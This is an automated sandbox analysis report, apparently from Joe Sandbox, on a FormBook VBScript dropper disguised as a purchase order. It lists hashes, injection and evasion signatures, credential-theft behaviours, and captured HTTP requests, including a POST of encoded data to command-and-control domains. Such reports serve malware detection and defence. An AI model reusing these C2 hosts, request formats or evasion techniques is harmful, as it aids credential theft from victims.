
Windows Analysis Report
PO1341489LTB GROUP.vbs

Overview

General Information

Sample name: PO1341489LTB GROUP.vbs
Analysis ID: 1576423
MD5: fe2b1e9947e1f7ab65d6542ba1abccc0
SHA1: 2753756f5438d94c49fad80ba14bb5440a4b260a
SHA256: d618b1d56fbd24ce3c15bfd5c238f9ad8695156667d4b6e04c378f8eca6e34d7

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (has network functionality)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 6148 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • x.exe (PID: 5796 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: D9A430A4C9B06A9C5F69147498335567)
      • aspnet_compiler.exe (PID: 6536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • JogKDBeJAc.exe (PID: 6000 cmdline: "C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • chkntfs.exe (PID: 5236 cmdline: "C:\Windows\SysWOW64\chkntfs.exe" MD5: A9B42ED1B14BB22EF07CCC8228697408)
            • JogKDBeJAc.exe (PID: 4444 cmdline: "C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

            System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", ProcessId: 6148, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5796, ParentProcessName: x.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 6536, ProcessName: aspnet_compiler.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs", ProcessId: 6148, ProcessName: wscript.exe
            No Suricata rule has matched


            AV Detection

Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\x.exe | ReversingLabs: Detection: 55%
Source: PO1341489LTB GROUP.vbs | Virustotal: Detection: 26%
Source: PO1341489LTB GROUP.vbs | ReversingLabs: Detection: 21%
Source: Yara match | File source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\x.exe | Joe Sandbox ML: detected
Source: Binary string: chkntfs.pdbGCTL | source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: JogKDBeJAc.exe, 00000005.00000002.3304097784.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp, JogKDBeJAc.exe, 00000007.00000002.3303611302.0000000000F9E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP | source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: aspnet_compiler.exe, 00000003.00000002.2338810334.0000000001870000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.000000000465E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3304683036.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2338493197.0000000004169000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 00000006.00000003.2341050723.0000000004314000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: aspnet_compiler.pdb | source: chkntfs.exe, 00000006.00000002.3305493710.0000000004AEC000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3303352157.0000000002688000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000000.2407341039.000000000310C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.000000001578C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: chkntfs.pdb | source: aspnet_compiler.exe, 00000003.00000002.2338526683.0000000001417000.00000004.00000020.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000005.00000003.2277403116.00000000008A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BNXCNJ22333.pdb | source: wscript.exe, 00000000.00000003.2078207053.000001B7B4DE4000.00000004.00000020.00020000.00000000.sdmp, x.exe.0.dr

            Networking

Source: Initial file | adodbStream.SaveToFile executablePath, 2 ' adSaveCreateOverWrite
Source: Joe Sandbox View | IP Address: 52.60.87.163
Source: Joe Sandbox View | IP Address: 103.224.182.242
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; date: Tue, 17 Dec 2024 02:41:11 GMT; server: Apache; set-cookie: __tad=1734403271.6175629; expires=Fri, 15-Dec-2034 02:41:11 GMT; Max-Age=315360000; vary: Accept-Encoding; content-encoding: gzip; content-length: 579; content-type: text/html; charset=UTF-8; connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; date: Tue, 17 Dec 2024 02:41:14 GMT; server: Apache; set-cookie: __tad=1734403274.7988264; expires=Fri, 15-Dec-2034 02:41:14 GMT; Max-Age=315360000; vary: Accept-Encoding; content-encoding: gzip; content-length: 579; content-type: text/html; charset=UTF-8; connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; date: Tue, 17 Dec 2024 02:41:17 GMT; server: Apache; set-cookie: __tad=1734403277.4596934; expires=Fri, 15-Dec-2034 02:41:17 GMT; Max-Age=315360000; vary: Accept-Encoding; content-encoding: gzip; content-length: 579; content-type: text/html; charset=UTF-8; connection: close
Source: global traffic | HTTP traffic detected: GET /lvnw/?-V8=PnfuVDu+NOzkAh7O+7Vj27VnnoRWHWCWtKII0z0YG5WqqHdwEfQqR5XVQmQd5mG7F2k9Soh0q42Pqx1rEU++5lE1fyewpKHAvlydGXlffERlJmNtF5QLa6mLyqy4r6QOPw==&2H=b6QHb8C0WpQhtV HTTP/1.1; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; Host: www.northidahoscans.online; User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
Source: global traffic | HTTP traffic detected: GET /q6c0/?-V8=DNozHXZRHwMop+WB0qwfBKpxfEH+ejoTyKy7EOTXMNRX1xYPjRGOw4JAj4pefwWAxfS0q+PDkH37PQMlxyuVDnop3GMN8cH/UXRq5XDzrWyHO52OJthmQYZMV7gmULD6fQ==&2H=b6QHb8C0WpQhtV HTTP/1.1; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; Host: www.brickhills.site; User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
Source: global traffic | HTTP traffic detected: GET /ocjg/?-V8=PsakXBZzgyoVbyp2hjDhUIAPjymto9iGXnTsMAFbSxg7wqJ/GaGLf9R1SWA0D+LwAwOTNpeqtTSBVw9+2LbbbxVu9AMo8WkIslXiFZquUVbpmyTV+kMBZINqQZENrlqOtg==&2H=b6QHb8C0WpQhtV HTTP/1.1; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; Host: www.pin-ballerz.net; User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
Source: global traffic | HTTP traffic detected: GET /83oq/?-V8=uON7WwvftimkH6+9fo1haamOfON2rQIMUfJSLV47BI3eNmd69pzs52jdBx/JPqPeVCXck41+K0Sv6SgSfr5VB9MDDVgyHUBPcljHHq+Df2KeZsyLZPWCaDvb78l21qpsnQ==&2H=b6QHb8C0WpQhtV HTTP/1.1; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; Host: www.allstary.top; User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
Source: global traffic | HTTP traffic detected: GET /nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtV HTTP/1.1; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; Host: www.waytoocool.life; User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
Source: global traffic | HTTP traffic detected: GET /xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtV HTTP/1.1; Accept: */*; Accept-Language: en-US,en;q=0.9; Connection: close; Host: www.timai.shop; User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
Source: global traffic | DNS traffic detected: DNS query: www.northidahoscans.online
Source: global traffic | DNS traffic detected: DNS query: www.brickhills.site
Source: global traffic | DNS traffic detected: DNS query: www.pin-ballerz.net
Source: global traffic | DNS traffic detected: DNS query: www.allstary.top
Source: global traffic | DNS traffic detected: DNS query: www.waytoocool.life
Source: global traffic | DNS traffic detected: DNS query: www.timai.shop
Source: unknown | HTTP traffic detected: POST /q6c0/ HTTP/1.1; Accept: */*; Accept-Language: en-US,en;q=0.9; Accept-Encoding: gzip, deflate, br; Content-Type: application/x-www-form-urlencoded; Content-Length: 204; Connection: close; Cache-Control: max-age=0; Host: www.brickhills.site; Origin: http://www.brickhills.site; Referer: http://www.brickhills.site/q6c0/; User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0); Data Ascii: -V8=OPATEhlEDEctpoiL+fcrA/BnCEScdUgI9923If/JO+tO2iczhGas9opv8Kp+RQONxfjSqN74mme8HVgIojGMCVIk+jAy+fGuNUlk/ljoql3lX+LzC7FEZpt+O7AmOLiqLNFKXqQtLv3WKf3JJeVoWA8xokdAJZfM/RZcNry8t5Ngmi+1jT8j1N5DOjbL788+OSSXg0Q=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:26 GMT; Server: Apache; Content-Length: 315; Connection: close; Content-Type: text/html; charset=iso-8859-1; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:29 GMT; Server: Apache; Content-Length: 315; Connection: close; Content-Type: text/html; charset=iso-8859-1; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:31 GMT; Server: Apache; Content-Length: 315; Connection: close; Content-Type: text/html; charset=iso-8859-1; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:34 GMT; Server: Apache; Content-Length: 315; Connection: close; Content-Type: text/html; charset=iso-8859-1; Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:42 GMT; Server: Apache; Content-Length: 389; Connection: close; Content-Type: text/html; Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:44 GMT; Server: Apache; Content-Length: 389; Connection: close; Content-Type: text/html; Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:47 GMT; Server: Apache; Content-Length: 389; Connection: close; Content-Type: text/html; Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Tue, 17 Dec 2024 02:41:50 GMT; Server: Apache; Content-Length: 389; Connection: close; Content-Type: text/html; charset=utf-8; Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Dec 2024 02:42:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Dec 2024 02:42:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 17 Dec 2024 02:42:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003686000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.brickhills.site/q6c0/?-V8=DNozHXZRHwMop
            Source: chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.northidahoscans.online/px.js?ch=1
            Source: chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.northidahoscans.online/px.js?ch=2
            Source: chkntfs.exe, 00000006.00000002.3305493710.0000000004ED4000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.00000000034F4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.northidahoscans.online/sk-logabpstatus.php?a=L2g4bEdyRU15NHN0SHVwVWZwYVdjU3FNL0laQndpc0cz
            Source: JogKDBeJAc.exe, 00000007.00000002.3306103928.00000000055A4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.timai.shop
            Source: JogKDBeJAc.exe, 00000007.00000002.3306103928.00000000055A4000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.timai.shop/xsla/
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cs.deviceatlas-cdn.com
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cs.deviceatlas-cdn.com/101dacs.js
            Source: chkntfs.exe, 00000006.00000002.3305493710.000000000551C000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000006.00000002.3306805444.0000000007270000.00000004.00000800.00020000.00000000.sdmp, JogKDBeJAc.exe, 00000007.00000002.3304665721.0000000003B3C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cs.deviceatlas-cdn.com/smartclick
            Source: firefox.exe, 00000009.00000002.2626329765.0000000015B74000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: chkntfs.exe, 00000006.00000002.3306929490.00000000075CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Xi
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: chkntfs.exe, 00000006.00000002.3303352157.00000000026CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: chkntfs.exe, 00000006.00000003.2517667390.00000000075A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
